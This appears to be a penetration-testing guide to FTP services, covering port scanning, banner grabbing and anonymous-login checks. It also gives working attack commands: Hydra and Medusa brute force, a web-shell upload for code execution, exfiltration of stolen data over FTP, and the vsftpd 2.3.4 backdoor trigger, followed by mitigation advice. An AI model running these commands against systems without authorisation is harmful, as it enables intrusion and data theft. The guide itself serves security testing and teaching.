FTP
FTP Services
File Transfer Protocol (FTP) is one of the oldest and most widely used protocols for transferring files between systems over a network. Despite its age and inherent security limitations, FTP remains common in many environments, making it an important target for penetration testers.
Protocol Overview
FTP operates using two channels:
Control Channel (Port 21): Handles commands and responses
Data Channel (Port 20 or random high port in passive mode): Transfers actual file data
Common Variants
FTP: Standard unencrypted FTP (Port 21)
FTPS: FTP with SSL/TLS encryption
SFTP: Not FTP, but a separate file transfer protocol that runs over SSH
Enumeration Techniques
Basic Port Scanning
# Identify FTP services
nmap -p 21 -sV <target>
# More comprehensive scan with scripts
nmap -p 21 --script=ftp-* <target>Banner Grabbing
FTP servers typically display a banner upon connection that can reveal valuable information:
nc -nv <target> 21
telnet <target> 21Example output:
220 ProFTPD 1.3.5a Server (FTP Server) [10.129.14.136]This reveals software name and version information that can be used to identify potential vulnerabilities.
Authentication Methods
Anonymous Access
One of the most common misconfigurations is allowing anonymous access:
ftp <target>
Username: anonymous
Password: anonymous@domain.comIf successful, this grants access without valid credentials - a significant security issue.
Brute Force Attacks
When anonymous access is not available, credential brute forcing can be attempted:
# Using Hydra
hydra -L users.txt -P passwords.txt ftp://<target>
# Using Medusa
medusa -u user -P passwords.txt -h <target> -M ftpExample Hydra execution:
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.129.14.136 ftp
[21][ftp] host: 10.129.14.136 login: user password: password123Common FTP Commands
Once authenticated, these commands are useful for interacting with the FTP server:
USER username
Authentication username
PASS password
Authentication password
HELP
Show available commands
PWD
Print working directory
DIR
List directory contents
CWD directory
Change working directory
GET filename
Download file
PUT filename
Upload file
PASV
Enable passive mode
QUIT
End session
Vulnerability Assessment
Common Vulnerabilities
Anonymous Authentication: Allows access without valid credentials
Cleartext Credentials: FTP transmits credentials in plaintext
Outdated Software: Many deployments run older versions with known vulnerabilities
Directory Traversal: Some implementations allow navigating outside intended directories
Brute Force Susceptibility: Often lacks account lockout mechanisms
Software-Specific Vulnerabilities
vsftpd 2.3.4
Backdoor vulnerability
ProFTPD < 1.3.5
Multiple RCE vulnerabilities
Pure-FTPd < 1.0.47
TLS/SSL vulnerabilities
FileZilla Server < 0.9.60
Multiple DoS vulnerabilities
Data Exfiltration and Access
Retrieving Files
Once authenticated to an FTP server, files can be retrieved:
ftp> get sensitive_file.txtFor multiple files:
ftp> prompt off
ftp> mget *.txtUploading Files
If write permissions exist, this can be leveraged for exploitation:
ftp> put shell.phpFor web servers that expose FTP directories, uploading web shells can lead to remote code execution.
Common Attack Scenarios
FTP Directory Exposure in Web Root
When FTP directories are accessible via web servers:
Authenticate to FTP
Upload web shell to FTP directory
Execute shell via web browser
Configuration File Access
FTP servers may expose sensitive configuration files:
ftp> get ftpusers
ftp> get user_list
ftp> get vsftpd.confThese files often contain plaintext credentials or security settings.
Abusing FTP for Data Exfiltration
In environments with restricted outbound connections, FTP can sometimes be used to exfiltrate data:
# From compromised system
ftp> put stolen_data.zipMisconfiguration Detection
Identifying Writable Directories
# Test ability to create directories
ftp> mkdir test
# Test file upload
ftp> put test.txtChecking Permissions
# List files with permissions
ftp> ls -laExample output:
drwxr-xr-x 2 user group 4096 Aug 1 12:00 .
drwxr-xr-x 4 user group 4096 Aug 1 12:00 ..
-rw-r--r-- 1 user group 1234 Aug 1 12:00 confidential.txtTesting Directory Traversal
# Attempt to navigate outside intended directory
ftp> cd ../
ftp> cd /etcFTP Penetration Testing Methodology
Discovery: Identify FTP services on the network
Banner Analysis: Gather version information
Authentication Testing: Try anonymous login, then credential attacks
Directory Enumeration: Map accessible directories and permissions
Configuration Review: Look for misconfigurations and security issues
Vulnerability Testing: Check for known vulnerabilities based on version
Exploitation: Attempt appropriate exploits
Post-Exploitation: Extract valuable information or establish persistence
Mitigation Strategies
When reporting FTP vulnerabilities, consider recommending:
Disable anonymous access unless explicitly required
Implement FTPS or SFTP instead of plain FTP
Restrict access to specific IP addresses
Implement strong password policies
Run FTP servers in chroot environments
Keep server software updated
Implement file integrity monitoring
Consider modern alternatives to FTP
Practical Commands for FTP Testing
Automating Anonymous Access Checks
# Create a script to test multiple hosts
for ip in $(cat targets.txt); do
echo "Testing $ip"
timeout 3 bash -c "echo -e 'anonymous\nanonymous@domain.com\nquit' | ftp -n $ip 2>/dev/null"
doneDownloading All Files Recursively
# Using wget for recursive download
wget -r ftp://anonymous:anonymous@$ipTesting Command Execution Vulnerabilities
For vulnerable versions like vsftpd 2.3.4:
# Triggering backdoor
telnet <target> 21
USER backdoor:)
PASS anyBy understanding FTP services and their security implications, penetration testers can effectively identify and exploit misconfigurations and vulnerabilities in these systems.
Last updated